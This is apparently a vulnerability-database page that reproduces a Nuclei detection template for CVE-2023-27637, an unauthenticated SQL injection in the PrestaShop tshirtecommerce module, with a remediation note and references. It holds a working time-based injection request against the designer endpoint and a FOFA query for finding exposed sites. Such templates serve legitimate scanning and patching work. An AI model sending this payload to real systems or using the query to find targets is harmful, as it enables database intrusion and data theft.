漏洞描述
The tshirtecommerce module for PrestaShop is vulnerable to unauthenticated SQL injection via the designer endpoint, allowing attackers to execute arbitrary SQL queries and extract sensitive information from the database.
CVE-2023-27637: PrestaShop `tshirtecommerce` Module - SQL Injection
PoC代码[已公开]
id: CVE-2023-27637
info:
name: PrestaShop `tshirtecommerce` Module - SQL Injection
author: ritikchaddha
severity: critical
description: |
The tshirtecommerce module for PrestaShop is vulnerable to unauthenticated SQL injection via the designer endpoint, allowing attackers to execute arbitrary SQL queries and extract sensitive information from the database.
remediation: |
Update the tshirtecommerce module to the latest version and apply all security patches.
reference:
- https://security.friendsofpresta.org/module/2023/03/21/tshirtecommerce_cwe-89.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-27637
- https://codecanyon.net/item/prestashop-custom-product-designer/19202018
- https://tshirtecommerce.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27637
cwe-id: CWE-89
epss-score: 0.4973
epss-percentile: 0.97741
cpe: cpe:2.3:a:tshirtecommerce:custom_product_designer:2.1.4:*:*:*:*:prestashop:*:*
metadata:
max-request: 1
vendor: tshirtecommerce
product: custom_product_designer
framework: prestashop
fofa-query: body="Prestashop" && body="tshirtecommerce"
tags: cve,cve2023,prestashop,tshirtecommerce,sqli,time-based-sqli
http:
- raw:
- |
@timeout: 30s
GET /module/tshirtecommerce/designer?product_id=900982561&parent_id=1;SELECT%20SLEEP(8); HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "duration>=8"
- "status_code == 200"
- "contains(tolower(body), 'product not found')"
condition: and
# digest: 490a004630440220658ed298c652b738964c9c8ab26220e56ece3dd2d7606f080652ecd110f144e1022010bd170681212c568e3d23660ab524fe8e161932c23e5459962b32862fb09efb:922c64590222798bb761d5b6d8e72950